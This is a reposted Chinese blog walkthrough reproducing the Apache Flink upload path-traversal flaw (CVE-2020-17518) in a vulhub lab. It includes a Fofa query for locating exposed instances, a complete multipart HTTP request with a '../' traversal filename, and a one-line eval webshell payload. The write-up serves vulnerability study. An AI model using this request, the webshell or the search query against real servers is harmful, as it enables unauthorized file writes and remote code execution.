Apche Flink上传目录穿越漏洞(CVE-2020-17518)

admin 2024年2月23日04:20:13评论8 views字数 1247阅读4分9秒阅读模式

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任!如有侵权请告知我们立即删除。

漏洞介绍

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。

影响版本 Fofa语句
Flink 1.5.1-1.11.2 js_name="es2015-polyfills.923637a8e6d276e6f6df.js"

环境搭建

  1. 利用vulhub搭建,搭建目录flink/CVE-2020-17518 使用命令:docker-compose up -dApche Flink上传目录穿越漏洞(CVE-2020-17518)

  2. 访问http://ip:8081/Apche Flink上传目录穿越漏洞(CVE-2020-17518)

漏洞复现

  1. 选择Submit New Job功能并上传文件抓包Apche Flink上传目录穿越漏洞(CVE-2020-17518)

  2. 用bp抓包之后,将filename位置的shell.jar改成../../../../../../tmp/shell并发送

poc:
POST /jars/upload HTTP/1.1
Host: 192.168.1.131:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2351364405237761153812142868
Content-Length: 259
Origin: http://192.168.1.131:8081
Connection: close
Referer: http://192.168.1.131:8081/

-----------------------------2351364405237761153812142868
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/shell"
Content-Type: application/octet-stream

<%eval request("123")%>

-----------------------------2351364405237761153812142868--
Apche Flink上传目录穿越漏洞(CVE-2020-17518)
  1. 进入docker容器查看文件是否上传成功。Apche Flink上传目录穿越漏洞(CVE-2020-17518)

成功上传


原文始发于微信公众号(Piusec):Apche Flink上传目录穿越漏洞(CVE-2020-17518)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日04:20:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apche Flink上传目录穿越漏洞(CVE-2020-17518)https://cn-sec.com/archives/2493228.html

发表评论

匿名网友 填写信息